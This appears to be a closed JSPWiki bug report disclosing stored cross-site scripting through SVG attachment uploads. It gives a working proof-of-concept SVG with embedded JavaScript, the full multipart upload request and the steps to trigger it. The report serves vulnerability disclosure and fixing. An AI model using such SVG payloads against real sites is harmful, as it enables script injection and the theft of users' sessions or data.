Details
- Bug
- Status: Closed
- Major
- Resolution: Fixed
- None
- None
Windows new version
Firefox version 84.0.1
Description
- Summary:
XSS exists via file upload. Upload an SVG file to trigger JavaScript.
* Steps to reproduce:
1. Create an SVG file containing:
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript"> alert(document.location); </script>
    </svg>
2. In URL: http://localhost:8081/wiki_jsp_war/Upload.jsp?page=LeftMenuFooter, upload the SVG file.
    POST /wiki_jsp_war/attach?progressid=be2d8a23-26ca-4652-ad43-ba7983bf2aa8 HTTP/1.1
    Host: localhost:8081
    ...
    -----------------------------308155045040371725912594659801
    Content-Disposition: form-data; name="nextpage"

    /wiki_jsp_war/Upload.jsp?page=LeftMenuFooter
    -----------------------------308155045040371725912594659801
    Content-Disposition: form-data; name="page"

    LeftMenuFooter
    -----------------------------308155045040371725912594659801
    Content-Disposition: form-data; name="action"

    upload
    -----------------------------308155045040371725912594659801
    Content-Disposition: form-data; name="kj2ztmbp"; filename="SVG_XSS.svg"
    Content-Type: image/svg+xml

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript"> alert(document.location); </script>
    </svg>
    -----------------------------308155045040371725912594659801
    Content-Disposition: form-data; name="changenote"

    -----------------------------308155045040371725912594659801
    Content-Disposition: form-data; name="upload"

    Upload
    -----------------------------308155045040371725912594659801--
3. Open the SVG file and the malicious JavaScript executes.
Attachments
Issue Links
- duplicates
  - JSPWIKI-1106 Attachment forceDownload property (Closed)